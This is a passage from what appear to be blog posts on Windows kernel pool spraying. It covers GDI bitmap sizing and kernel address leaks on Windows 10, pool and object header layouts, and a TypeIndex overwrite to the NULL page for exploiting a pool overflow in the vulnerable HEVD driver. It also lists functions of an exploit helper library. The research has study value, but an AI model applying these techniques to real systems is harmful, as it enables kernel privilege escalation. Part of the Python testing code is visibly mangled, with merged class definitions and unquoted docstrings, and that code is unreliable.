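    pixel_bytes = width * height * bits_per_pel // 8
    total = pixel_bytes + SURFACE_HEADER_SIZE + POOL_HEADER_SIZE
    return align_up(total, POOL_GRANULARITY)

def width_for_pool_size(size):
    """Reverse direction for height 1 and 8 bits per pixel."""
    return size - SURFACE_HEADER_SIZE - POOL_HEADER_SIZE

for args in [(820, 2, 8), (1000, 2, 8), (0xc08, 1, 8)]:
    print(args, hex(bitmap_pool_size(*args)))
```

The three results match the sizes reported by the neighbouring POOL_HEADERs in the dumps: 0x8d0, 0xa40 and 0xe70.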

There is one more thing: it seems that if the bitmap is small, it will be at least 0x370 in size:

create_bitmap(100, 1, 8)

lkd> dc 0xFFFFF9014269B320-10
fffff901`4269b310  23370009 35616c47 65b7acb6 cf1485cc  ..7#Gla5...e....
fffff901`4269b320  06050ad3 00000000 00000000 80000000  ................
fffff901`4269b330  00000000 00000000 00000000 00000000  ................
fffff901`4269b340  06050ad3 00000000 00000000 00000000  ................
fffff901`4269b350  00000000 00000000 00000064 00000001  ........d.......
fffff901`4269b360  00000064 00000000 4269b578 fffff901  d.......x.iB....
fffff901`4269b370  4269b578 fffff901 00000064 00003c23  x.iB....d...#<..
fffff901`4269b380  00000003 00010000 00000000 00000000  ................
lkd> dc 0xFFFFF9014269B320-10+370
fffff901`4269b680  00030037 65657246 65b7a926 cf1485cc  7...Free&..e....
fffff901`4269b690  46b60e20 ffffd000 4251c970 fffff901   ..F....p.QB....
fffff901`4269b6a0  4269b6b0 fffff901 13995a90 fffff960  ..iB.....Z..`...
fffff901`4269b6b0  230f0003 34616c47 423b7108 fffff901  ...#Gla4.q;B....
fffff901`4269b6c0  00000000 00000000 00000000 80000000  ................
fffff901`4269b6d0  00000000 00000000 000000d8 00000000  ................
fffff901`4269b6e0  00000000 72724401 4269b738 fffff901  .....Drr8.iB....
fffff901`4269b6f0  4269b6f0 fffff901 4269b6f0 fffff901  ..iB......iB....

create_bitmap(1, 1, 8)

lkd> dc 0xFFFFF90142615370-10
fffff901`42615360  2337000e 35616c47 42615360 fffff901  ..7#Gla5`SaB....
fffff901`42615370  13050ad9 00000000 00000000 80000000  ................
fffff901`42615380  00000000 00000000 00000000 00000000  ................
fffff901`42615390  13050ad9 00000000 00000000 00000000  ................
fffff901`426153a0  00000000 00000000 00000001 00000001  ................
fffff901`426153b0  00000004 00000000 426155c8 fffff901  .........UaB....
fffff901`426153c0  426155c8 fffff901 00000004 0000407f  .UaB.........@..
fffff901`426153d0  00000003 00010000 00000000 00000000  ................
lkd> dc 0xFFFFF90142615370-10+370
fffff901`426156d0  00250037 65657246 65bf4976 cf1485cc  7.%.FreevI.e....
fffff901`426156e0  42417570 fffff901 46b61040 ffffd000  puAB....@..F....
fffff901`426156f0  40768dd0 fffff901 488e1a50 000001f8  ..v@....P..H....
fffff901`42615700  00000000 00000000 00000000 00000000  ................
fffff901`42615710  00000000 00000000 00000000 00000000  ................
fffff901`42615720  00000000 00000000 00000000 00000000  ................
fffff901`42615730  00000000 00000000 00000000 00000000  ................
fffff901`42615740  00000000 00000000 00000000 00000000  ................

So this is for the smaller allocations. For allocations at least 0x1000, we don’t have POOL_HEADER, as they go to the large pool, so if I do:

create_bitmap(0xda8, 1, 8)

(0xda8 + 0x258 = 0x1000)

They are allocated right after each other:

[+] Bitmap handle: 0x370508e8L
[*] Bitmap's kernel address: 0xFFFFF901426E0000
[+] Bitmap handle: 0xffffffffa80507d0L
[*] Bitmap's kernel address: 0xFFFFF901426E1000
[+] Bitmap handle: 0x38050680L
[*] Bitmap's kernel address: 0xFFFFF901426E2000
[+] Bitmap handle: 0x2405067fL
[*] Bitmap's kernel address: 0xFFFFF901426E3000

If I do:

create_bitmap(0x12a8, 1, 8)

That will create an 0x1500 byte allocation, and finally the !pool command started to produce output:

lkd> !pool 0xFFFFF90142768000
Pool page fffff90142768000 region is Paged session pool
fffff90142768000 is not a valid large pool allocation, checking large session pool...
*fffff90142768000 : large page allocation, tag is Gh05, size is 0x1500 bytes
  Pooltag Gh05 : GDITAG_HMGR_SURF_TYPE, Binary : win32k.sys

We can also see the “Frag” and “Free” tags at the end, marking the end of the allocation:

lkd> dc 0xFFFFF90142768000 + 1500
fffff901`42769500  23020000 67617246 00000000 00000000  ...#Frag........
fffff901`42769510  00001500 00000000 00000000 00000000  ................
fffff901`42769520  00ae0002 65657246 00000000 00000000  ....Free........
fffff901`42769530  4276b530 fffff901 42767530 fffff901  0.vB....0uvB....
fffff901`42769540  00000000 00000000 00000000 00000000  ................
fffff901`42769550  00000000 00000000 00000000 00000000  ................
fffff901`42769560  00000000 00000000 00000000 00000000  ................
fffff901`42769570  00000000 00000000 00000000 00000000  ................

So our final function would be:

def allocate_bitmap_with_given_size(s):
 if s < 0x370:
  print "[-] Too small size, such Bitmap can't be allocated..."
 elif s < 0x1000:
  print "[+] Allocating Bitmap in the Paged pool"
  # subtract the SURFACE64 part (0x258) and the POOL_HEADER (0x10)
  width = s - 0x258 - 0x10
  create_bitmap (width, 1, 8)
 else:
  print "[+] Allocating Bitmap in the Paged session pool / large pool"
  # large pool allocations have no POOL_HEADER
  width = s - 0x258
  create_bitmap (width, 1, 8)

If I made any mistakes, let me know. This was tested on Win10 x64 v1511 only. The structures are different on x86 so that will be different for sure.

Here is the Python code I used for testing:

from ctypes import *
from ctypes.wintypes import *

ULONG = c_uint32

class PEB(Structure):
 _fields_ = [
  ("Stuff", c_byte * 0xF8),
  ("GdiSharedHandleTable", PVOID)
 _fields_ = [
  ("Reserved1", PVOID),
  ("PebBaseAddress", POINTER(PEB)),
  ("Reserved2", PVOID * 2),
  ("UniqueProcessId", ULONG_PTR),
  ("Reserved3", PVOID)

class GDICELL64(Structure):
 _fields_ = [
  ("pKernelAddress", PVOID64),
  ("wProcessId", USHORT), 
  ("wCount", USHORT),
  ("wUpper", USHORT),
  ("wType", USHORT),
  ("pUserAddress", PVOID64)

ntdll = windll.ntdll
gdi32 = windll.gdi32
kernel32 = windll.kernel32

ntdll.NtQueryInformationProcess.argtypes = [HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG]
ntdll.NtQueryInformationProcess.restype = NTSTATUS

gdi32.CreateBitmap.argtypes = [c_int, c_int, UINT, UINT, c_void_p]
gdi32.CreateBitmap.restype = HBITMAP

ProcessBasicInformation = 0 #Retrieves a pointer to a PEB structure that can be used to determine whether the specified process is being debugged, and a unique value used by the system to identify the specified process. It is best to use the CheckRemoteDebuggerPresent and GetProcessId functions to obtain this information.

def create_bitmap(width, height, cBitsPerPel):
 bitmap_handle = HBITMAP()

 bitmap_handle = gdi32.CreateBitmap(width, height, 1, cBitsPerPel, None)
 if bitmap_handle == None:
  print "[-] Error creating manager bitmap, exiting...."
 print "[+] Bitmap handle: %s" % hex(bitmap_handle)
 return bitmap_handle
def get_gdisharedhandletable():
 This function will return the GdiSharedHandleTable address of the current process
 process_basic_information = PROCESS_BASIC_INFORMATION()
 ntdll.NtQueryInformationProcess(kernel32.GetCurrentProcess(), ProcessBasicInformation, byref(process_basic_information), sizeof(process_basic_information), None)
 peb = process_basic_information.PebBaseAddress.contents
 return peb.GdiSharedHandleTable

def get_bitmap_kernel_address(bitmap_handle):
 Get the kernel address of the bitmap, works up to Windows 10 v1511
 gdicell64_address = get_gdisharedhandletable() + (bitmap_handle & 0xFFFF) * sizeof(GDICELL64()) #the address is in user space
 gdicell64 = cast(gdicell64_address,POINTER(GDICELL64))
 print "[*] Bitmap's kernel address: 0x%X" % gdicell64.contents.pKernelAddress
 return gdicell64.contents.pKernelAddress

for i in range(100):
        bitmap_handle = create_bitmap(0x12a8, 1, 8)
        bitmap_kernel_address = get_bitmap_kernel_address(bitmap_handle)
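
The address arithmetic in get_bitmap_kernel_address can be checked without touching Windows at all. The sketch below is only an illustration: the table base is a made-up value, the handle is just an example, and I use fixed-width ctypes integers in place of PVOID64 / USHORT so the structure size is the same on any platform.

```python
import ctypes

class GDICELL64(ctypes.Structure):
    # Same field layout as the GDICELL64 structure above, with fixed-width types.
    _fields_ = [
        ("pKernelAddress", ctypes.c_uint64),
        ("wProcessId", ctypes.c_uint16),
        ("wCount", ctypes.c_uint16),
        ("wUpper", ctypes.c_uint16),
        ("wType", ctypes.c_uint16),
        ("pUserAddress", ctypes.c_uint64),
    ]

def gdicell_address(table_base, handle):
    """Return the user-space address of the table entry for a GDI handle."""
    index = handle & 0xFFFF          # the low 16 bits of the handle are the table index
    return table_base + index * ctypes.sizeof(GDICELL64)

# Hypothetical table base and example handle value, for illustration only.
EXAMPLE_TABLE_BASE = 0x1000000
EXAMPLE_HANDLE = 0x1d050b24
entry_address = gdicell_address(EXAMPLE_TABLE_BASE, EXAMPLE_HANDLE)
```

Each entry is 0x18 bytes, so index 0xb24 lands 0xb24 * 0x18 bytes into the table.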

Update (2017.10.28):

Windows 10x64 v1607

Looks like the !poolfind and !pool commands are not broken when debugging this version, which makes things easier. On the other hand, I can't leak the address of the bitmap with the previous technique. There is a universal method, but for that I need to know the size of the bitmap that will be allocated, and also calculate the size of the other object that helps leak the bitmap address, so it's a chicken-and-egg problem. Anyhow, luckily I can use the commands.

create_bitmap(1640, 1, 8)

kd> dc fffff027023f3730-10
fffff027`023f3720  238e004a 35306847 00000000 00000000  J..#Gh05........
fffff027`023f3730  1d050b24 00000000 00000000 00000000  $...............
fffff027`023f3740  00000000 00000000 00000000 00000000  ................
fffff027`023f3750  1d050b24 00000000 00000000 00000000  $...............
fffff027`023f3760  00000000 00000000 00000668 00000001  ........h.......
fffff027`023f3770  00000668 00000000 023f3990 fffff027  h........9?.'...
fffff027`023f3780  023f3990 fffff027 00000668 00005d70  .9?.'...h...p]..
fffff027`023f3790  00000003 00010000 00000000 00000000  ................
kd> !pool fffff027023f3730
Pool page fffff027023f3730 region is Paged session pool
fffff027023f3000 is not a valid large pool allocation, checking large session pool...
 fffff027023f3260 size:   20 previous size:    0  (Allocated)  Frag
 fffff027023f3280 size:  4a0 previous size:   20  (Free)       Free
*fffff027023f3720 size:  8e0 previous size:  4a0  (Allocated) *Gh05
  Pooltag Gh05 : GDITAG_HMGR_SURF_TYPE, Binary : win32k.sys

The allocation became larger (on Win10x64 v1511 this would have been 0x8d0). The reason is that the BITMAP_DATA offset changed from 0x258 to 0x260 (pvScan0 points here, measured from the beginning of the object; in the dump above 0x023f3990 - 0x023f3730 = 0x260).
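
The size difference can be reproduced with a bit of arithmetic. This is a minimal sketch under my own assumptions: a 1-row, 8 bits per pixel bitmap whose width is a multiple of 4 (so the pixel data is exactly width bytes), a 0x10-byte x64 pool header, and 0x10-byte pool granularity. It only covers normal pool chunks, not the lookaside or large pool cases shown later.

```python
POOL_HEADER_SIZE = 0x10   # assumption: x64 POOL_HEADER
POOL_GRANULARITY = 0x10   # assumption: x64 pool chunks are 0x10-byte aligned

def bitmap_chunk_size(width, bitmap_data_offset):
    """Pool chunk size for create_bitmap(width, 1, 8), header included."""
    raw = width + bitmap_data_offset + POOL_HEADER_SIZE
    # round up to the next multiple of the pool granularity
    return (raw + POOL_GRANULARITY - 1) & ~(POOL_GRANULARITY - 1)

size_v1607 = bitmap_chunk_size(1640, 0x260)
size_v1511 = bitmap_chunk_size(1640, 0x258)
```

For width 1640 (0x668) this gives 0x8e0 with the 0x260 offset and 0x8d0 with the 0x258 offset, matching the !pool output and the v1511 number.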

Let’s take a look at small bitmaps:

create_bitmap(1, 1, 8)

kd> !poolfind Gla5 -session

Scanning large pool allocation table for tag 0x35616c47 (Gla5) (ffffbc07f20c0000 : ffffbc07f20c6000)

fffff027046815c0 : tag Gla5, size     0x360, Paged session pool
fffff02704681930 : tag Gla5, size     0x360, Paged session pool
fffff02704681ca0 : tag Gla5, size     0x360, Paged session pool
fffff02701b792b0 : tag Gla5, size     0x360, Paged session pool
fffff027023af930 : tag Gla5, size     0x360, Paged session pool
fffff027023afca0 : tag Gla5, size     0x360, Paged session pool
kd> dc fffff02702305ca0-10
fffff027`02305c90  23370037 35616c47 00000000 00000000  7.7#Gla5........
fffff027`02305ca0  02050886 00000000 00000000 80000000  ................
fffff027`02305cb0  00000000 00000000 00000000 00000000  ................
fffff027`02305cc0  02050886 00000000 00000000 00000000  ................
fffff027`02305cd0  00045010 fffff027 00000020 00000040  .P..'... ...@...
fffff027`02305ce0  00000100 00000000 02305f00 fffff027  ........._0.'...
fffff027`02305cf0  02305f00 fffff027 00000004 000010c3  ._0.'...........
fffff027`02305d00  00000001 00010000 00000000 00000000  ................
kd> !pool fffff02702305ca0
Pool page fffff02702305ca0 region is Paged session pool
fffff02702305000 is not a valid large pool allocation, checking large session pool...
 fffff02702305260 size:   20 previous size:    0  (Allocated)  Frag
 fffff02702305280 size:   10 previous size:   20  (Free)       Free
 fffff02702305290 size:   b0 previous size:   10  (Allocated)  Uscu Process: ffffbc07f150c800
 fffff02702305340 size:   e0 previous size:   b0  (Allocated)  Gla8
 fffff02702305420 size:  370 previous size:   e0  (Allocated)  Gla5
 fffff02702305790 size:   e0 previous size:  370  (Allocated)  Gla8
 fffff02702305870 size:   b0 previous size:   e0  (Allocated)  Uscu Process: ffffbc07f150c800
 fffff02702305920 size:  370 previous size:   b0  (Allocated)  Gla5
*fffff02702305c90 size:  370 previous size:  370  (Allocated) *Gla5
  Pooltag Gla5 : GDITAG_HMGR_LOOKASIDE_SURF_TYPE, Binary : win32k.sys

So that remained 0x370.

What about large pools?

create_bitmap(0xda0, 1, 8)

kd> !pool fffff02704f5a000
Pool page fffff02704f5a000 region is Paged session pool
fffff02704f5a000 is not a valid large pool allocation, checking large session pool...
*fffff02704f5a000 : large page allocation, tag is Gh05, size is 0x1000 bytes
  Pooltag Gh05 : GDITAG_HMGR_SURF_TYPE, Binary : win32k.sys
kd> dc fffff02704f5a000
fffff027`04f5a000  17050c9c 00000000 00000000 00000000  ................
fffff027`04f5a010  00000000 00000000 00000000 00000000  ................
fffff027`04f5a020  17050c9c 00000000 00000000 00000000  ................
fffff027`04f5a030  00000000 00000000 00000da0 00000001  ................
fffff027`04f5a040  00000da0 00000000 04f5a260 fffff027  ........`...'...
fffff027`04f5a050  04f5a260 fffff027 00000da0 0000b2b7  `...'...........
fffff027`04f5a060  00000003 00010000 00000000 00000000  ................
fffff027`04f5a070  04800200 00000000 00000000 00000000  ................

This looks to follow the same pattern; again, the only change is the BITMAP_DATA offset. So the logic for Win10x64 v1607 is:

def allocate_bitmap_with_given_size(s):
 if s < 0x370:
  print "[-] Too small size, such Bitmap can't be allocated..."
 elif s < 0x1000:
  print "[+] Allocating Bitmap in the Paged session pool"
  # subtract the BITMAP_DATA offset and the 0x10 byte POOL_HEADER
  width = s - 0x260 - 0x10
  create_bitmap (width, 1, 8)
 else:
  print "[+] Allocating Bitmap in the Paged session pool / large pool"
  # large pool allocations have no POOL_HEADER in front of them
  width = s - 0x260
  create_bitmap (width, 1, 8)


Win7x64 to Win10v1607:
See the details in:


Friday, September 15, 2017

Windows kernel pool spraying fun - Part 4 - object & pool headers, kex & putting it all together

2 weeks... LOL... I had to finish this up. :)

This post will be looooong: we check the actual objects and their headers, finally put together the actual exploit for HEVD, and I release my first version of kex.

Before we move on to the actual exploitation, we need to prepare some more data for our objects. When we do a pool overflow, we write outside of the hole (this is why we need to precisely control where the new allocation lands) and overwrite the next object. Since we allocated those objects ourselves, we know what we overwrite, but we need to work out what to place there, as messing with kernel structures is a fast way towards BSODs.

I made a spray, and this is what I have:

Object location: 87999400
Pool page 87999400 region is Nonpaged pool
 87999000 size:   50 previous size:    0  (Allocated)  Muta (Protected)
 87999050 size:   10 previous size:   50  (Free)       P...
 87999060 size:   50 previous size:   10  (Free )  Muta (Protected)
 879990b0 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999100 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999150 size:   50 previous size:   50  (Free )  Muta (Protected)
 879991a0 size:   50 previous size:   50  (Free )  Muta (Protected)
 879991f0 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999240 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999290 size:   50 previous size:   50  (Free )  Muta (Protected)
 879992e0 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999330 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999380 size:   50 previous size:   50  (Free )  Muta (Protected)
*879993d0 size:   50 previous size:   50  (Allocated) *Muta (Protected)
Pooltag Muta : Mutant objects
 87999420 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999470 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 879994c0 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999510 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999560 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 879995b0 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999600 size:   50 previous size:   50  (Allocated)  Muta (Protected)

We can see that the object is at 0x87999400 while the actual allocation starts at 0x879993d0, so the object is at offset +0x30 from the beginning of the pool chunk. That's because the POOL_HEADER, potential OPTIONAL_HEADERS and the OBJECT_HEADER are there (see:), and we can see that they will always be the same for our allocation (showing the pool headers here), except for the PreviousSize, which can vary, but we can predict it:

||1:lkd> dt nt!_POOL_HEADER 879993d0 
   +0x000 PreviousSize     : 0y000001010 (0xa)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001010 (0xa)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x40a000a
   +0x004 PoolTag          : 0xe174754d
   +0x004 AllocatorBackTraceIndex : 0x754d
   +0x006 PoolTagHash      : 0xe174
||1:lkd> dt nt!_POOL_HEADER 879993d0+50
   +0x000 PreviousSize     : 0y000001010 (0xa)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001010 (0xa)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x40a000a
   +0x004 PoolTag          : 0xe174754d
   +0x004 AllocatorBackTraceIndex : 0x754d
   +0x006 PoolTagHash      : 0xe174
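
The bitfields in the dt output above are all packed into Ulong1, so they can be decoded by hand. A small sketch, using the x86 field widths shown by dt (9 bits PreviousSize, 7 bits PoolIndex, 9 bits BlockSize, 7 bits PoolType); the function name is mine:

```python
def decode_pool_header_ulong1(ulong1):
    """Split the first DWORD of an x86 POOL_HEADER into its bitfields."""
    return {
        "PreviousSize": ulong1 & 0x1FF,          # bits 0-8, in units of 8 bytes
        "PoolIndex": (ulong1 >> 9) & 0x7F,       # bits 9-15
        "BlockSize": (ulong1 >> 16) & 0x1FF,     # bits 16-24, in units of 8 bytes
        "PoolType": (ulong1 >> 25) & 0x7F,       # bits 25-31
    }

fields = decode_pool_header_ulong1(0x040a000a)
block_size_in_bytes = fields["BlockSize"] * 8
```

BlockSize 0xa times 8 is 0x50, which is the chunk size !pool reports for the Mutant objects.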

The OBJECT_HEADER will be at offset 0x18:

||1:lkd> !object 87999400
Object: 87999400  Type: (8521a838) Mutant
    ObjectHeader: 879993e8 (new version)
    HandleCount: 1  PointerCount: 1

||1:lkd> dt nt!_OBJECT_HEADER 879993e8 
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xe ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x86e0bd80 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x86e0bd80 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

and the others will be the same:

||1:lkd> !object 87999400+50
Object: 87999450  Type: (8521a838) Mutant
    ObjectHeader: 87999438 (new version)
    HandleCount: 1  PointerCount: 1
||1:lkd> dt nt!_OBJECT_HEADER 879993e8 +50
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xe ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x86e0bd80 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x86e0bd80 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

They could be different if we had more handles open, but since we do the spraying, no one else will care about these objects. The object body starts at offset 0x18 within the OBJECT_HEADER, which itself sits at offset 0x18 in the pool chunk; this is how we get to our object at offset 0x30.

We can also see this if we dump the entire 0x50 bytes:

||1:lkd> dd 879993d0 L50/4
879993d0  040a0070 e174754d 00000000 00000050
879993e0  00000000 00000000 00000001 00000001
879993f0  00000000 0008000e 86e0bd80 00000000
87999400  00080002 00000001 87999408 87999408
87999410  00000000 00000000 00000000 00000000

||1:lkd> dd 879993d0+50 L50/4
87999420  040a000a e174754d 00000000 00000050
87999430  00000000 00000000 00000001 00000001
87999440  00000000 0008000e 86e0bd80 00000000
87999450  00080002 00000001 87999458 87999458
87999460  00000000 00000000 00000000 00000000
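
To see which bytes are which, the first 0x28 bytes of the second dump can be parsed with struct. This is only a sketch: I assume the 0x10 bytes between the POOL_HEADER and the OBJECT_HEADER are a single optional header (which would fit InfoMask 0x8), and the helper name is made up.

```python
import struct

# First 0x28 bytes of the second Mutant chunk, copied from the dd output above.
CHUNK_PREFIX = [0x040a000a, 0xe174754d, 0x00000000, 0x00000050, 0x00000000,
                0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x0008000e]

POOL_HEADER_SIZE = 0x08       # x86 POOL_HEADER
OPTIONAL_HEADER_SIZE = 0x10   # assumption: one 0x10-byte optional header
OBJECT_HEADER_OFFSET = POOL_HEADER_SIZE + OPTIONAL_HEADER_SIZE   # 0x18
BODY_OFFSET = OBJECT_HEADER_OFFSET + 0x18                        # 0x30

def parse_prefix(dwords):
    """Pull the interesting fields out of the first 0x28 bytes of a chunk."""
    raw = struct.pack("<10I", *dwords)
    # clear the top bit of the tag (the 'Protected' marker) before decoding it
    tag = struct.pack("<I", dwords[1] & 0x7FFFFFFF).decode("ascii")
    pointer_count, handle_count = struct.unpack_from("<ii", raw, OBJECT_HEADER_OFFSET)
    type_index, trace_flags, info_mask, flags = struct.unpack_from(
        "<4B", raw, OBJECT_HEADER_OFFSET + 0x0C)
    return {"tag": tag, "PointerCount": pointer_count, "HandleCount": handle_count,
            "TypeIndex": type_index, "InfoMask": info_mask}

parsed = parse_prefix(CHUNK_PREFIX)
```

The last DWORD (0x0008000e) is the one that carries the TypeIndex in its lowest byte, at offset 0x24 of the chunk.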

The low word of the first DWORD (0070 vs. 000a) holds the PreviousSize, which is what changes between the two chunks. So if we overflow into this object and write the same 0x28 bytes, we will be safe: we overwrote the object with the same data. That's nice, but why is it good for us? Well, we will modify the data, specifically the TypeIndex, which is 0xe in the case above. The TypeIndex is an index into the object type table, which tells us what kind of object this is:

||1:lkd> dd nt!ObTypeIndexTable+4*0xe L1
82b805b8  8521a838
||1:lkd> dt nt!_OBJECT_TYPE 8521a838
   +0x000 TypeList         : _LIST_ENTRY [ 0x8521a838 - 0x8521a838 ]
   +0x008 Name             : _UNICODE_STRING "Mutant"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xe ''
   +0x018 TotalNumberOfObjects : 0x187ff
   +0x01c TotalNumberOfHandles : 0x1880f
   +0x020 HighWaterNumberOfObjects : 0x7a26a
   +0x024 HighWaterNumberOfHandles : 0x7a28e
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x078 TypeLock         : _EX_PUSH_LOCK
   +0x07c Key              : 0x6174754d
   +0x080 CallbackList     : _LIST_ENTRY [ 0x8521a8b8 - 0x8521a8b8 ]

It has an embedded structure, the OBJECT_TYPE_INITIALIZER, which gives us a list of pointers to functions that are called at certain points of the object's lifecycle.

||1:lkd> dt nt!_OBJECT_TYPE_INITIALIZER 8521a838+0x28
   +0x000 Length           : 0x50
   +0x002 ObjectTypeFlags  : 0 ''
   +0x002 CaseInsensitive  : 0y0
   +0x002 UnnamedObjectsOnly : 0y0
   +0x002 UseDefaultObject : 0y0
   +0x002 SecurityRequired : 0y0
   +0x002 MaintainHandleCount : 0y0
   +0x002 MaintainTypeList : 0y0
   +0x002 SupportsObjectCallbacks : 0y0
   +0x002 CacheAligned     : 0y0
   +0x004 ObjectTypeCode   : 2
   +0x008 InvalidAttributes : 0x100
   +0x00c GenericMapping   : _GENERIC_MAPPING
   +0x01c ValidAccessMask  : 0x1f0001
   +0x020 RetainAccess     : 0
   +0x024 PoolType         : 0 ( NonPagedPool )
   +0x028 DefaultPagedPoolCharge : 0
   +0x02c DefaultNonPagedPoolCharge : 0x50
   +0x030 DumpProcedure    : (null) 
   +0x034 OpenProcedure    : (null) 
   +0x038 CloseProcedure   : (null) 
   +0x03c DeleteProcedure  : 0x82afe453     void  nt!ExpDeleteMutant+0
   +0x040 ParseProcedure   : (null) 
   +0x044 SecurityProcedure : 0x82ca2936     long  nt!SeDefaultObjectMethod+0
   +0x048 QueryNameProcedure : (null) 
   +0x04c OkayToCloseProcedure : (null) 

Now, if we zero out the TypeIndex, this is what we get:

||1:lkd> dd nt!ObTypeIndexTable+4*0x0 L1
82b80580  00000000

Based on this, once the index is zero, the kernel will look for the OBJECT_TYPE, and then the OBJECT_TYPE_INITIALIZER structure inside it, at the NULL page, which we can map on Win 7 x86 (not in later versions).
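
With the OBJECT_TYPE assumed to sit at address 0, the location of each procedure pointer follows from the two dt outputs above: TypeInfo is at +0x28 in OBJECT_TYPE, and the procedures are at +0x30 to +0x4c in OBJECT_TYPE_INITIALIZER. A tiny sketch of that arithmetic (Win7 x86 offsets only, helper name is mine):

```python
TYPE_INFO_OFFSET = 0x28   # _OBJECT_TYPE.TypeInfo, from the dt output above

# _OBJECT_TYPE_INITIALIZER procedure offsets, from the dt output above (Win7 x86)
PROCEDURE_OFFSETS = {
    "DumpProcedure": 0x30,
    "OpenProcedure": 0x34,
    "CloseProcedure": 0x38,
    "DeleteProcedure": 0x3c,
    "ParseProcedure": 0x40,
    "SecurityProcedure": 0x44,
    "QueryNameProcedure": 0x48,
    "OkayToCloseProcedure": 0x4c,
}

def procedure_slot(name, object_type_base=0):
    """Address of a procedure pointer for an OBJECT_TYPE located at object_type_base."""
    return object_type_base + TYPE_INFO_OFFSET + PROCEDURE_OFFSETS[name]

close_slot = procedure_slot("CloseProcedure")
```

For the real Mutant type at 0x8521a838 the same function gives the address of its DeleteProcedure pointer, 0x8521a89c.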

Now we just need to have a collection of the first 0x28 bytes from the beginning of the pool allocation for the various objects.

During the collection I found that in case of named objects the above is slightly different. For example:

Named Semaphore:
9a06fb38 //pointer to ???? I couldn't figure out what is there. Anyone? It's changing between reloads.
00260026 //length of the name * 2 as it's stored in Unicode
adecd178 //pointer to the name (UNICODE)

So it's not that easy to use a named object: we have a varying pointer and I don't know where it points, and I'm not sure what would happen if I put a pointer to user space there for the name. We can't predict the pointer in kernel space. Another one that doesn't really work is IoCompletionPort. So I removed all of these from my list. Anyhow, even without these we have a good set of objects, and some further research is needed on the others. This is what we have with the PreviousSize zeroed out:

pool_object_headers['unnamed_mutex'] = [0x040a0000,0xe174754d,0x00000000,0x00000050,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x0008000e]
pool_object_headers['unnamed_job'] = [0x042d0000,0xa0626f4a,0x00000000,0x00000168,0x0000006c,0x86e0bd80,0x00000001,0x00000001,0x00000000,0x00080006]
pool_object_headers['iocompletionreserve'] = [0x040c0000,0xef436f49,0x00000000,0x0000005c,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x0008000a]
pool_object_headers['unnamed_semaphore'] = [0x04090000,0xe16d6553,0x00000000,0x00000044,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x00080010]
pool_object_headers['event'] = [0x04080000,0xee657645,0x00000000,0x00000040,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x0008000c]

A quick note on the PreviousSize field: we always know what it should be. We know the exact size of the hole we create, and this value is simply that size divided by 8, so we can always generate it dynamically. It's added to the code.
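
As a rough sketch of that calculation (not necessarily how kex does it internally; the function bodies here are my own illustration), the PreviousSize can be merged into the first DWORD of one of the header lists above like this:

```python
def calculate_previous_size(required_hole_size):
    """PreviousSize is stored in units of 8 bytes on x86."""
    if required_hole_size % 8 != 0 or not 0 < required_hole_size <= 0x1FF * 8:
        raise ValueError("hole size must be a multiple of 8 that fits in 9 bits")
    return required_hole_size // 8

def patch_previous_size(header_dwords, required_hole_size):
    """Return a copy of the header with PreviousSize set for the given hole."""
    patched = list(header_dwords)
    # PreviousSize occupies the low 9 bits of the first DWORD
    patched[0] = (patched[0] & ~0x1FF) | calculate_previous_size(required_hole_size)
    return patched

unnamed_mutex = [0x040a0000, 0xe174754d, 0x00000000, 0x00000050, 0x00000000,
                 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x0008000e]
patched_header = patch_previous_size(unnamed_mutex, 0x200)
```

For a 0x200 hole the first DWORD becomes 0x040a0040, and the original list is left untouched.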

Now let's go to exploitation.

What is kex? Well, it stands for kernel exploitation, and if you pronounce it, in Hungarian it means 'cookie' (although that word is written as keksz; 'ksz' is pronounced as 'x'). It's a collection of functions that can help with writing kernel exploits faster. At this moment it has the following functions:

def allocate_object(object_to_use, variance):
def find_object_to_spray(required_hole_size):
def spray(required_hole_size):
def make_hole(required_hole_size, good_object):
def gimme_the_hole(required_hole_size):
def close_all_handles():
def calculate_previous_size(required_hole_size):
def pool_overwrite(required_hole_size,good_object):
def ctl_code(function,
def getLastError():
def alloc_memory(base_address, input, input_size):
def find_driver_base(driver=None):
def get_haldispatchtable():
